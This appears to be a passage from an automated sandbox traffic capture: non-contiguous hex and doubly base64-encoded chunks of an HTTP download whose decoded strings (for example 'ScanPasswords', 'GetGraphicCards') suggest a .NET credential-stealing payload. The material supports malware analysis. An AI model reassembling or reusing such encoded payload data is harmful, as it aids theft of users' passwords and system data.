                                                                                                                                                                                Data Ascii: wQTdDOEFBQUFBbGdBYUhVTVREUURvTVFBQUFBQ1JBRDRxWFJNT0FPd3pBQUFBQUpZQW9TQXBBdzhBZkRRQUFBQUFsZ0RYSUNrREVBQU1OUUFBQUFDV0FCMGRrUk1SQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC169INData Raw: 58 00 42 00 6e 00 52 00 45 00 4a 00 55 00 64 00 30 00 46 00 42 00 51 00 55 00 46 00 44 00 56 00 30 00 46 00 4f 00 54 00 55 00 6f 00 76 00 61 00 46 00 4e 00 77 00 51 00 56 00 42 00 47 00 55 00 45 00 46 00 42 00 51 00 55 00 46 00 42 00 53 00 6c 00 6c 00 42 00 5a 00 47 00 74 00 55 00 4b 00 30 00 5a 00 4c 00 64 00 30 00 46 00 49 00 52 00 6b 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 57 00 78 00 6e 00 52 00 44 00 6c 00 44 00 5a 00 6a 00 52 00 56 00 63 00 6e 00 64 00 44 00 53 00 56 00 56 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 58 00 51 00 55 00 74 00 6b 00 52 00 53 00 39 00 6f 00 55 00 33 00 6c 00 42 00 54 00 44 00 56 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4b 00 57 00 55 00 45 00 35 00 55 00 58 00 59 00 72 00 52 00 6b 00 78 00 56 00 51
                                                                                                                                                                                Data Ascii: XBnREJUd0FBQUFDV0FOTUovaFNwQVBGUEFBQUFBSllBZGtUK0ZLd0FIRkFBQUFBQWxnRDlDZjRVcndDSVVBQUFBQUNXQUtkRS9oU3lBTDVRQUFBQUFKWUE5UXYrRkxVQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC174INData Raw: 00 56 00 54 00 68 00 42 00 5a 00 55 00 4e 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4b 00 57 00 55 00 45 00 32 00 55 00 32 00 4a 00 30 00 52 00 6c 00 51 00 77 00 51 00 69 00 74 00 4a 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 4e 00 57 00 64 00 48 00 61 00 45 00 78 00 6d 00 5a 00 31 00 5a 00 51 00 64 00 30 00 56 00 42 00 5a 00 31 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 47 00 31 00 42 00 57 00 45 00 55 00 33 00 4c 00 33 00 68 00 57 00 51 00 55 00 46 00 59 00 65 00 55 00 4a 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 6c 00 5a 00 57 00 53 00 74 00 55 00 54 00 55 00 4a 00 42 00 52 00 55 00 56 00 43 00 61 00 45 00 6c 00 46 00 51 00 55 00 46 00 42 00 51 00 55 00 45 00 31 00 5a 00 30 00 64 00 6f 00 54 00 47 00 5a 00 6e 00 56 00 6c 00 46 00
                                                                                                                                                                                Data Ascii: VThBZUNBQUFBQUFKWUE2U2J0RlQwQitJQUFBQUFBNWdHaExmZ1ZQd0VBZ1FBQUFBRG1BWEU3L3hWQUFYeUJBQUFBQUlZWStUTUJBRUVCaElFQUFBQUE1Z0doTGZnVlF
                                                                                                                                                                                2021-12-01 09:04:36 UTC178INData Raw: 4a 00 47 00 53 00 47 00 39 00 43 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 34 00 5a 00 31 00 5a 00 68 00 52 00 56 00 70 00 46 00 56 00 57 00 56 00 33 00 52 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 45 00 52 00 30 00 4a 00 54 00 63 00 30 00 46 00 78 00 55 00 6c 00 49 00 34 00 51 00 56 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 54 00 56 00 6c 00 47 00 53 00 6e 00 64 00 4f 00 4d 00 30 00 5a 00 49 00 4d 00 45 00 4a 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 58 00 68 00 6e 00 57 00 46 00 5a 00 43 00 53 00 6e 00 64 00 56 00 5a 00 6d 00 64 00 46 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 52 00 48 00 51 00 6c 00 52 00 72 00 53 00 48 00 52 00 6f 00 55 00 69
                                                                                                                                                                                Data Ascii: JGSG9CQUFBQUFBQUF4Z1ZhRVpFVWV3RUFBQUFBQUFER0JTc0FxUlI4QVFBQUFBQUFBTVlGSndOM0ZIMEJBQUFBQUFBQXhnWFZCSndVZmdFQUFBQUFBQURHQlRrSHRoUi
                                                                                                                                                                                2021-12-01 09:04:36 UTC182INData Raw: 00 48 00 4e 00 42 00 63 00 6d 00 64 00 48 00 55 00 33 00 42 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 48 00 51 00 31 00 42 00 46 00 54 00 31 00 5a 00 42 00 56 00 33 00 56 00 42 00 57 00 6e 00 56 00 73 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4a 00 57 00 55 00 6b 00 77 00 61 00 45 00 46 00 69 00 51 00 55 00 73 00 34 00 51 00 6d 00 38 00 32 00 56 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 61 00 47 00 64 00 71 00 59 00 55 00 56 00 47 00 55 00 55 00 5a 00 79 00 64 00 30 00 64 00 7a 00 63 00 46 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 30 00 64 00 44 00 52 00 54 00 52 00 53 00 52 00 33 00 64 00 44 00 64 00 30 00 46 00 69 00 55 00 32 00 78 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 6c 00 5a 00 53 00 56 00 5a 00 6f 00 52 00 6c 00 56 00 43 00
                                                                                                                                                                                Data Ascii: HNBcmdHU3BRQUFBQUNHQ1BFT1ZBV3VBWnVsQUFBQUFJWUkwaEFiQUs4Qm82VUFBQUFBaGdqYUVGUUZyd0dzcFFBQUFBQ0dDRTRSR3dDd0FiU2xBQUFBQUlZSVZoRlVC
                                                                                                                                                                                2021-12-01 09:04:36 UTC186INData Raw: 48 00 65 00 56 00 46 00 45 00 56 00 30 00 46 00 52 00 56 00 33 00 42 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 6c 00 5a 00 53 00 54 00 4a 00 6e 00 57 00 56 00 46 00 42 00 54 00 6c 00 6c 00 43 00 52 00 48 00 46 00 72 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 6f 00 5a 00 32 00 6b 00 78 00 51 00 30 00 31 00 72 00 51 00 54 00 46 00 33 00 52 00 56 00 64 00 78 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 44 00 52 00 30 00 4e 00 4d 00 4d 00 45 00 6c 00 46 00 51 00 55 00 52 00 59 00 51 00 56 00 49 00 72 00 63 00 45 00 46 00 42 00 51 00 55 00 46 00 42 00 53 00 56 00 6c 00 4a 00 52 00 58 00 64 00 32 00 53 00 6b 00 46 00 4f 00 5a 00 30 00 4a 00 4b 00 4e 00 6d 00 74 00 42 00 51 00 55 00 46 00 42 00 51 00 57 00 68 00 6e 00 5a 00 32 00 4a 00 44 00 65 00 45 00 46
                                                                                                                                                                                Data Ascii: HeVFEV0FRV3BBQUFBQUlZSTJnWVFBTllCRHFrQUFBQUFoZ2kxQ01rQTF3RVdxUUFBQUFDR0NMMElFQURYQVIrcEFBQUFBSVlJRXd2SkFOZ0JKNmtBQUFBQWhnZ2JDeEF
                                                                                                                                                                                2021-12-01 09:04:36 UTC188INData Raw: 00 42 00 51 00 57 00 64 00 33 00 51 00 6e 00 68 00 42 00 55 00 57 00 4e 00 5a 00 4e 00 57 00 64 00 47 00 4d 00 58 00 46 00 6e 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 45 00 51 00 55 00 6c 00 4e 00 52 00 30 00 52 00 43 00 61 00 6d 00 35 00 42 00 57 00 55 00 4e 00 78 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4a 00 54 00 55 00 45 00 76 00 55 00 57 00 39 00 59 00 52 00 30 00 39 00 6e 00 51 00 6d 00 6b 00 32 00 62 00 30 00 46 00 42 00 51 00 55 00 46 00 42 00 5a 00 33 00 64 00 42 00 52 00 45 00 52 00 70 00 53 00 56 00 6b 00 32 00 55 00 55 00 64 00 58 00 63 00 57 00 64 00 42 00 51 00 55 00 46 00 42 00 51 00 30 00 52 00 42 00 54 00 48 00 64 00 52 00 54 00 46 00 4a 00 71 00 63 00 55 00 46 00 68 00 52 00 33 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00
                                                                                                                                                                                Data Ascii: BQWd3QnhBUWNZNWdGMXFnQUFBQUNEQUlNR0RCam5BWUNxQUFBQUFJTUEvUW9YR09nQmk2b0FBQUFBZ3dBRERpSVk2UUdXcWdBQUFBQ0RBTHdRTFJqcUFhR3FBQUFBQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC192INData Raw: 55 00 4a 00 52 00 51 00 6c 00 68 00 48 00 55 00 55 00 46 00 42 00 51 00 6d 00 64 00 43 00 55 00 30 00 64 00 52 00 51 00 55 00 46 00 43 00 64 00 30 00 4a 00 6a 00 55 00 55 00 46 00 42 00 51 00 55 00 4e 00 42 00 51 00 6c 00 52 00 52 00 51 00 55 00 46 00 42 00 51 00 31 00 46 00 44 00 56 00 56 00 42 00 52 00 51 00 55 00 46 00 44 00 5a 00 30 00 46 00 6d 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00 52 00 52 00 48 00 5a 00 52 00 55 00 55 00 46 00 42 00 51 00 56 00 46 00 44 00 52 00 31 00 42 00 42 00 51 00 57 00 64 00 42 00 5a 00 30 00 4a 00 78 00 55 00 6b 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 6d 00 4e 00 52 00 51 00 55 00 46 00 42 00 51 00 6b 00 46 00 43 00 56 00 46 00 46 00 42 00 51 00 55 00 46 00 43 00 55 00 55 00 4e 00 56 00 55 00 46 00 46 00 42 00 51
                                                                                                                                                                                Data Ascii: UJRQlhHUUFBQmdCU0dRQUFCd0JjUUFBQUNBQlRRQUFBQ1FDVVBRQUFDZ0FmT0FBQUFRRHZRUUFBQVFDR1BBQWdBZ0JxUkFBQUF3QmNRQUFBQkFCVFFBQUFCUUNVUFFBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC196INData Raw: 00 51 00 79 00 74 00 51 00 55 00 55 00 46 00 42 00 51 00 56 00 46 00 44 00 63 00 30 00 78 00 6e 00 51 00 55 00 46 00 42 00 5a 00 30 00 45 00 78 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 79 00 74 00 51 00 55 00 55 00 46 00 42 00 51 00 56 00 46 00 44 00 63 00 30 00 78 00 6e 00 51 00 55 00 46 00 42 00 5a 00 30 00 45 00 78 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 79 00 74 00 51 00 55 00 55 00 46 00 42 00 51 00 56 00 46 00 44 00 63 00 30 00 78 00 6e 00 51 00 55 00 46 00 42 00 5a 00 30 00 45 00 78 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 79 00 74 00 51 00 55 00 55 00 46 00 42 00 51 00 56 00 46 00 44 00 63 00 30 00 78 00 6e 00 51 00 55 00 46 00 42 00 5a 00 30 00 45 00 78 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00
                                                                                                                                                                                Data Ascii: QytQUUFBQVFDc0xnQUFBZ0ExT0FBQUF3QytQUUFBQVFDc0xnQUFBZ0ExT0FBQUF3QytQUUFBQVFDc0xnQUFBZ0ExT0FBQUF3QytQUUFBQVFDc0xnQUFBZ0ExT0FBQUF
                                                                                                                                                                                2021-12-01 09:04:36 UTC200INData Raw: 64 00 51 00 55 00 55 00 46 00 42 00 51 00 56 00 46 00 44 00 54 00 30 00 70 00 6e 00 51 00 55 00 46 00 42 00 55 00 55 00 4e 00 50 00 53 00 6d 00 64 00 42 00 51 00 55 00 46 00 52 00 51 00 30 00 39 00 4b 00 5a 00 30 00 46 00 42 00 51 00 56 00 46 00 44 00 54 00 30 00 70 00 6e 00 51 00 55 00 46 00 42 00 55 00 55 00 4e 00 50 00 53 00 6d 00 64 00 42 00 51 00 55 00 46 00 52 00 51 00 30 00 39 00 4b 00 5a 00 30 00 46 00 42 00 51 00 56 00 46 00 44 00 54 00 30 00 70 00 6e 00 51 00 55 00 46 00 42 00 55 00 55 00 4e 00 50 00 53 00 6d 00 64 00 42 00 51 00 55 00 46 00 52 00 51 00 30 00 39 00 4b 00 5a 00 30 00 46 00 42 00 51 00 56 00 46 00 44 00 54 00 30 00 70 00 6e 00 51 00 55 00 46 00 42 00 55 00 55 00 4e 00 50 00 53 00 6d 00 64 00 42 00 51 00 55 00 46 00 52 00 51 00 30
                                                                                                                                                                                Data Ascii: dQUUFBQVFDT0pnQUFBUUNPSmdBQUFRQ09KZ0FBQVFDT0pnQUFBUUNPSmdBQUFRQ09KZ0FBQVFDT0pnQUFBUUNPSmdBQUFRQ09KZ0FBQVFDT0pnQUFBUUNPSmdBQUFRQ0
                                                                                                                                                                                2021-12-01 09:04:36 UTC204INData Raw: 00 30 00 46 00 42 00 51 00 56 00 46 00 43 00 5a 00 46 00 46 00 52 00 51 00 55 00 46 00 42 00 55 00 55 00 4d 00 35 00 53 00 6e 00 64 00 5a 00 51 00 56 00 64 00 52 00 51 00 55 00 70 00 42 00 52 00 6d 00 74 00 42 00 53 00 45 00 46 00 43 00 4f 00 45 00 46 00 43 00 4d 00 45 00 46 00 6d 00 51 00 55 00 46 00 6c 00 51 00 55 00 68 00 33 00 51 00 55 00 6c 00 42 00 51 00 6a 00 68 00 42 00 52 00 46 00 6c 00 42 00 56 00 31 00 46 00 43 00 56 00 30 00 46 00 42 00 62 00 30 00 46 00 57 00 5a 00 30 00 4d 00 31 00 51 00 55 00 5a 00 5a 00 51 00 55 00 4a 00 6e 00 51 00 6c 00 64 00 42 00 52 00 6d 00 74 00 42 00 56 00 6d 00 64 00 43 00 56 00 6b 00 46 00 42 00 61 00 30 00 45 00 72 00 56 00 45 00 31 00 43 00 51 00 55 00 4a 00 46 00 51 00 53 00 74 00 55 00 54 00 55 00 5a 00 42 00
                                                                                                                                                                                Data Ascii: 0FBQVFCZFFRQUFBUUM5SndZQVdRQUpBRmtBSEFCOEFCMEFmQUFlQUh3QUlBQjhBRFlBV1FCV0FBb0FWZ0M1QUZZQUJnQldBRmtBVmdCVkFBa0ErVE1CQUJFQStUTUZB
                                                                                                                                                                                2021-12-01 09:04:36 UTC209INData Raw: 43 00 4b 00 33 00 70 00 33 00 63 00 30 00 4a 00 74 00 61 00 30 00 56 00 74 00 55 00 30 00 31 00 33 00 51 00 6d 00 78 00 46 00 52 00 57 00 74 00 71 00 51 00 54 00 5a 00 43 00 61 00 48 00 64 00 43 00 62 00 56 00 4e 00 4e 00 5a 00 6b 00 4a 00 6f 00 64 00 30 00 49 00 72 00 65 00 6e 00 64 00 7a 00 51 00 6d 00 6c 00 52 00 51 00 6e 00 52 00 43 00 4f 00 58 00 6c 00 43 00 61 00 58 00 64 00 43 00 64 00 45 00 49 00 35 00 65 00 55 00 4a 00 75 00 61 00 30 00 56 00 74 00 61 00 58 00 46 00 48 00 51 00 6d 00 35 00 72 00 52 00 56 00 56 00 44 00 53 00 45 00 70 00 42 00 51 00 58 00 64 00 43 00 4e 00 6e 00 70 00 50 00 4d 00 55 00 46 00 45 00 55 00 55 00 4a 00 45 00 65 00 6a 00 68 00 75 00 51 00 55 00 46 00 33 00 51 00 6d 00 6c 00 34 00 63 00 44 00 42 00 42 00 56 00 46 00 46
                                                                                                                                                                                Data Ascii: CK3p3c0Jta0VtU013QmxFRWtqQTZCaHdCbVNNZkJod0IrendzQmlRQnRCOXlCaXdCdEI5eUJua0VtaXFHQm5rRVVDSEpBQXdCNnpPMUFEUUJEejhuQUF3Qml4cDBBVFF
                                                                                                                                                                                2021-12-01 09:04:36 UTC213INData Raw: 00 68 00 77 00 4f 00 45 00 4a 00 4e 00 52 00 55 00 4e 00 58 00 65 00 6e 00 68 00 68 00 52 00 48 00 4e 00 46 00 51 00 31 00 64 00 36 00 65 00 56 00 6c 00 45 00 63 00 55 00 56 00 47 00 52 00 48 00 67 00 33 00 4f 00 45 00 46 00 75 00 61 00 30 00 4e 00 6f 00 65 00 6c 00 64 00 30 00 52 00 48 00 4a 00 72 00 51 00 33 00 5a 00 45 00 4b 00 33 00 70 00 45 00 64 00 6e 00 64 00 43 00 4b 00 31 00 52 00 4f 00 4d 00 45 00 46 00 42 00 52 00 55 00 51 00 33 00 51 00 69 00 39 00 77 00 52 00 48 00 4e 00 46 00 51 00 31 00 70 00 36 00 65 00 6e 00 56 00 45 00 63 00 30 00 56 00 44 00 52 00 48 00 67 00 33 00 4d 00 6b 00 52 00 6f 00 52 00 55 00 52 00 34 00 51 00 33 00 4e 00 44 00 52 00 48 00 64 00 52 00 51 00 30 00 35 00 71 00 4f 00 54 00 68 00 43 00 51 00 58 00 64 00 44 00 54 00
                                                                                                                                                                                Data Ascii: hwOEJNRUNXenhhRHNFQ1d6eVlEcUVGRHg3OEFua0Noeld0RHJrQ3ZEK3pEdndCK1ROMEFBRUQ3Qi9wRHNFQ1p6enVEc0VDRHg3MkRoRUR4Q3NDRHdRQ05qOThCQXdDT
                                                                                                                                                                                2021-12-01 09:04:36 UTC220INData Raw: 00 42 00 61 00 48 00 64 00 33 00 52 00 48 00 46 00 48 00 63 00 30 00 46 00 6f 00 64 00 33 00 64 00 45 00 4e 00 30 00 64 00 31 00 51 00 57 00 68 00 33 00 64 00 30 00 46 00 4e 00 52 00 33 00 64 00 42 00 61 00 58 00 64 00 33 00 51 00 57 00 52 00 48 00 65 00 55 00 46 00 70 00 64 00 33 00 64 00 42 00 64 00 55 00 63 00 77 00 51 00 57 00 6c 00 33 00 64 00 30 00 45 00 76 00 52 00 7a 00 4a 00 42 00 61 00 58 00 64 00 33 00 51 00 6c 00 46 00 48 00 4e 00 45 00 46 00 70 00 64 00 33 00 64 00 43 00 61 00 45 00 63 00 32 00 51 00 57 00 6c 00 33 00 64 00 30 00 4a 00 35 00 52 00 7a 00 68 00 42 00 61 00 58 00 64 00 33 00 51 00 30 00 52 00 48 00 4f 00 46 00 46 00 70 00 56 00 58 00 64 00 42 00 53 00 45 00 56 00 50 00 51 00 57 00 6c 00 33 00 64 00 30 00 4e 00 56 00 52 00 33 00
                                                                                                                                                                                Data Ascii: BaHd3RHFHc0Fod3dEN0d1QWh3d0FNR3dBaXd3QWRHeUFpd3dBdUcwQWl3d0EvRzJBaXd3QlFHNEFpd3dCaEc2QWl3d0J5RzhBaXd3Q0RHOFFpVXdBSEVPQWl3d0NVR3
                                                                                                                                                                                2021-12-01 09:04:36 UTC229INData Raw: 00 64 00 46 00 62 00 45 00 46 00 42 00 53 00 55 00 46 00 4a 00 64 00 30 00 56 00 75 00 51 00 55 00 46 00 46 00 51 00 55 00 70 00 42 00 52 00 57 00 35 00 42 00 51 00 55 00 6c 00 42 00 53 00 6c 00 46 00 46 00 63 00 45 00 46 00 42 00 52 00 55 00 46 00 4b 00 5a 00 30 00 56 00 77 00 51 00 55 00 46 00 4a 00 51 00 55 00 70 00 33 00 52 00 58 00 4a 00 42 00 51 00 55 00 56 00 42 00 53 00 30 00 46 00 46 00 63 00 6b 00 46 00 42 00 53 00 55 00 46 00 4c 00 55 00 55 00 56 00 30 00 51 00 55 00 46 00 46 00 51 00 55 00 74 00 6e 00 52 00 58 00 52 00 42 00 51 00 55 00 6c 00 42 00 53 00 33 00 64 00 46 00 64 00 6b 00 46 00 42 00 52 00 55 00 46 00 4d 00 51 00 55 00 56 00 32 00 51 00 55 00 46 00 4a 00 51 00 55 00 31 00 52 00 52 00 58 00 68 00 42 00 51 00 55 00 56 00 42 00 54 00
                                                                                                                                                                                Data Ascii: dFbEFBSUFJd0VuQUFFQUpBRW5BQUlBSlFFcEFBRUFKZ0VwQUFJQUp3RXJBQUVBS0FFckFBSUFLUUV0QUFFQUtnRXRBQUlBS3dFdkFBRUFMQUV2QUFJQU1RRXhBQUVBT
                                                                                                                                                                                2021-12-01 09:04:36 UTC245INData Raw: 00 52 00 6a 00 4d 00 45 00 39 00 56 00 53 00 6b 00 52 00 53 00 52 00 47 00 4e 00 34 00 54 00 56 00 52 00 52 00 65 00 6c 00 46 00 72 00 55 00 54 00 52 00 53 00 56 00 55 00 6c 00 36 00 54 00 57 00 70 00 4f 00 52 00 46 00 4a 00 55 00 54 00 55 00 46 00 51 00 52 00 6c 00 42 00 53 00 5a 00 32 00 52 00 44 00 64 00 32 00 4a 00 71 00 4e 00 57 00 6c 00 59 00 4d 00 54 00 68 00 36 00 51 00 55 00 52 00 33 00 4b 00 32 00 4e 00 47 00 4f 00 57 00 5a 00 4e 00 64 00 30 00 4a 00 48 00 5a 00 46 00 63 00 31 00 61 00 6c 00 6c 00 45 00 54 00 55 00 46 00 61 00 4d 00 6c 00 59 00 77 00 57 00 44 00 42 00 73 00 61 00 30 00 31 00 33 00 51 00 6e 00 70 00 61 00 57 00 46 00 4a 00 6d 00 55 00 31 00 64 00 52 00 65 00 6b 00 46 00 48 00 55 00 6a 00 4a 00 6a 00 4d 00 6e 00 42 00 77 00 59 00
                                                                                                                                                                                Data Ascii: RjME9VSkRSRGN4TVRRelFrUTRSVUl6TWpORFJUTUFQRlBSZ2RDd2JqNWlYMTh6QUR3K2NGOWZNd0JHZFc1allETUFaMlYwWDBsa013QnpaWFJmU1dRekFHUjJjMnBwY
                                                                                                                                                                                2021-12-01 09:04:36 UTC252INData Raw: 00 6e 00 65 00 55 00 35 00 71 00 59 00 33 00 68 00 53 00 61 00 6d 00 64 00 42 00 57 00 6a 00 4a 00 57 00 4d 00 46 00 67 00 78 00 56 00 6c 00 56 00 53 00 61 00 6d 00 64 00 42 00 55 00 45 00 51 00 30 00 4e 00 56 00 67 00 78 00 4f 00 48 00 64 00 59 00 65 00 6d 00 64 00 42 00 55 00 45 00 5a 00 51 00 55 00 6d 00 64 00 6b 00 51 00 33 00 64 00 69 00 61 00 6a 00 56 00 70 00 57 00 44 00 45 00 34 00 64 00 31 00 68 00 36 00 5a 00 30 00 46 00 51 00 52 00 44 00 56 00 32 00 57 00 44 00 45 00 34 00 4e 00 45 00 46 00 48 00 5a 00 47 00 78 00 6b 00 52 00 6a 00 6c 00 4b 00 57 00 6b 00 52 00 6e 00 51 00 57 00 4d 00 79 00 56 00 6a 00 42 00 59 00 4d 00 47 00 78 00 72 00 54 00 30 00 46 00 43 00 61 00 47 00 4d 00 79 00 55 00 6e 00 4a 00 5a 00 56 00 31 00 49 00 78 00 54 00 30 00
                                                                                                                                                                                Data Ascii: neU5qY3hSamdBWjJWMFgxVlVSamdBUEQ0NVgxOHdYemdBUEZQUmdkQ3diajVpWDE4d1h6Z0FQRDV2WDE4NEFHZGxkRjlKWkRnQWMyVjBYMGxrT0FCaGMyUnJZV1IxT0
                                                                                                                                                                                2021-12-01 09:04:36 UTC268INData Raw: 00 4b 00 62 00 45 00 46 00 48 00 5a 00 47 00 78 00 6b 00 52 00 6a 00 6c 00 4b 00 59 00 6d 00 35 00 61 00 61 00 47 00 4e 00 74 00 62 00 47 00 68 00 69 00 62 00 6c 00 4a 00 45 00 5a 00 46 00 64 00 34 00 4d 00 47 00 52 00 59 00 53 00 6d 00 78 00 42 00 52 00 57 00 52 00 73 00 5a 00 45 00 56 00 73 00 64 00 46 00 6c 00 58 00 5a 00 47 00 78 00 52 00 62 00 55 00 5a 00 36 00 57 00 6c 00 46 00 43 00 53 00 6c 00 70 00 48 00 56 00 6e 00 56 00 6b 00 52 00 32 00 77 00 77 00 5a 00 56 00 5a 00 4f 00 62 00 47 00 4a 00 74 00 55 00 6d 00 78 00 6a 00 61 00 30 00 70 00 6f 00 59 00 7a 00 4a 00 56 00 51 00 56 00 59 00 79 00 56 00 6d 00 6c 00 56 00 62 00 56 00 5a 00 36 00 59 00 30 00 63 00 35 00 64 00 57 00 4d 00 79 00 56 00 55 00 46 00 53 00 4d 00 6c 00 59 00 77 00 56 00 57 00
                                                                                                                                                                                Data Ascii: KbEFHZGxkRjlKYm5aaGNtbGhiblJEZFd4MGRYSmxBRWRsZEVsdFlXZGxRbUZ6WlFCSlpHVnVkR2wwZVZObGJtUmxja0poYzJVQVYyVmlVbVZ6Y0c5dWMyVUFSMlYwVW
                                                                                                                                                                                2021-12-01 09:04:36 UTC284INData Raw: 00 6b 00 64 00 57 00 49 00 7a 00 54 00 6a 00 42 00 68 00 56 00 30 00 35 00 36 00 51 00 55 00 56 00 61 00 63 00 46 00 70 00 58 00 65 00 47 00 74 00 6a 00 64 00 30 00 4a 00 75 00 57 00 6c 00 68 00 53 00 5a 00 6c 00 46 00 74 00 4f 00 54 00 46 00 69 00 62 00 56 00 4a 00 36 00 51 00 55 00 56 00 6b 00 62 00 47 00 52 00 46 00 5a 00 48 00 6c 00 5a 00 57 00 45 00 4a 00 76 00 59 00 56 00 64 00 4f 00 52 00 46 00 6c 00 59 00 53 00 6d 00 74 00 6a 00 64 00 30 00 4a 00 49 00 57 00 6c 00 68 00 53 00 52 00 6d 00 4a 00 75 00 55 00 6e 00 42 00 6b 00 53 00 47 00 78 00 45 00 57 00 56 00 68 00 4b 00 61 00 32 00 4e 00 33 00 51 00 6c 00 52 00 5a 00 4d 00 6b 00 5a 00 31 00 56 00 55 00 64 00 47 00 65 00 6d 00 4d 00 7a 00 5a 00 48 00 5a 00 6a 00 62 00 56 00 4a 00 36 00 51 00 55 00
                                                                                                                                                                                Data Ascii: kdWIzTjBhV056QUVacFpXeGtjd0JuWlhSZlFtOTFibVJ6QUVkbGRFZHlZWEJvYVdORFlYSmtjd0JIWlhSRmJuUnBkSGxEWVhKa2N3QlRZMkZ1VUdGemMzZHZjbVJ6QU
                                                                                                                                                                                2021-12-01 09:04:36 UTC300INData Raw: 00 6a 00 51 00 56 00 70 00 52 00 51 00 6e 00 56 00 42 00 52 00 31 00 56 00 42 00 59 00 32 00 64 00 43 00 63 00 45 00 46 00 48 00 54 00 55 00 46 00 6b 00 51 00 55 00 4a 00 6f 00 51 00 55 00 5a 00 33 00 51 00 56 00 56 00 6e 00 51 00 6b 00 68 00 42 00 52 00 31 00 56 00 42 00 59 00 6d 00 64 00 43 00 62 00 45 00 46 00 49 00 53 00 55 00 46 00 68 00 55 00 55 00 4a 00 71 00 51 00 55 00 63 00 34 00 51 00 56 00 6c 00 52 00 51 00 6e 00 52 00 42 00 52 00 32 00 74 00 42 00 55 00 6e 00 64 00 43 00 62 00 45 00 46 00 48 00 4e 00 45 00 46 00 61 00 55 00 55 00 4a 00 35 00 51 00 55 00 64 00 72 00 51 00 56 00 6c 00 33 00 51 00 6e 00 56 00 42 00 52 00 32 00 4e 00 42 00 57 00 45 00 46 00 42 00 51 00 55 00 51 00 77 00 59 00 30 00 46 00 61 00 55 00 55 00 4a 00 31 00 51 00 55 00
                                                                                                                                                                                Data Ascii: jQVpRQnVBR1VBY2dCcEFHTUFkQUJoQUZ3QVVnQkhBR1VBYmdCbEFISUFhUUJqQUc4QVlRQnRBR2tBUndCbEFHNEFaUUJ5QUdrQVl3QnVBR2NBWEFBQUQwY0FaUUJ1QU
                                                                                                                                                                                2021-12-01 09:04:36 UTC316INData Raw: 00 34 00 51 00 56 00 52 00 52 00 51 00 57 00 64 00 42 00 52 00 6d 00 4e 00 42 00 59 00 56 00 46 00 43 00 56 00 45 00 46 00 49 00 61 00 30 00 46 00 6a 00 64 00 30 00 49 00 77 00 51 00 55 00 64 00 56 00 51 00 57 00 4a 00 52 00 51 00 58 00 56 00 42 00 52 00 7a 00 52 00 42 00 54 00 58 00 64 00 42 00 65 00 55 00 46 00 47 00 4f 00 45 00 46 00 56 00 51 00 55 00 4a 00 35 00 51 00 55 00 63 00 34 00 51 00 56 00 6c 00 33 00 51 00 6c 00 52 00 42 00 53 00 47 00 74 00 42 00 59 00 33 00 64 00 43 00 4d 00 45 00 46 00 48 00 56 00 55 00 46 00 69 00 55 00 55 00 46 00 31 00 51 00 55 00 64 00 56 00 51 00 57 00 4e 00 33 00 51 00 6e 00 70 00 42 00 51 00 30 00 46 00 42 00 56 00 6e 00 64 00 43 00 62 00 30 00 46 00 48 00 56 00 55 00 46 00 6a 00 5a 00 30 00 4a 00 55 00 51 00 55 00
                                                                                                                                                                                Data Ascii: 4QVRRQWdBRmNBYVFCVEFIa0Fjd0IwQUdVQWJRQXVBRzRBTXdBeUFGOEFVQUJ5QUc4QVl3QlRBSGtBY3dCMEFHVUFiUUF1QUdVQWN3QnpBQ0FBVndCb0FHVUFjZ0JUQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC332INData Raw: 00 4c 00 51 00 54 00 46 00 42 00 57 00 55 00 46 00 42 00 55 00 57 00 64 00 54 00 5a 00 31 00 46 00 72 00 53 00 55 00 46 00 42 00 55 00 55 00 4a 00 49 00 55 00 56 00 56 00 4a 00 52 00 30 00 46 00 6e 00 52 00 6b 00 46 00 42 00 53 00 55 00 4e 00 48 00 51 00 6d 00 64 00 4f 00 51 00 55 00 46 00 52 00 55 00 6d 00 64 00 31 00 52 00 55 00 39 00 45 00 61 00 45 00 64 00 44 00 4e 00 56 00 4a 00 48 00 51 00 7a 00 5a 00 52 00 59 00 32 00 64 00 42 00 5a 00 30 00 56 00 55 00 51 00 55 00 4a 00 4e 00 51 00 6b 00 4a 00 52 00 51 00 55 00 46 00 46 00 62 00 30 00 6c 00 57 00 52 00 32 00 64 00 6a 00 53 00 6b 00 4e 00 43 00 53 00 6a 00 6c 00 47 00 55 00 6b 00 55 00 31 00 51 00 56 00 4a 00 4c 00 51 00 6b 00 46 00 43 00 53 00 30 00 4a 00 42 00 51 00 6b 00 70 00 57 00 52 00 57 00
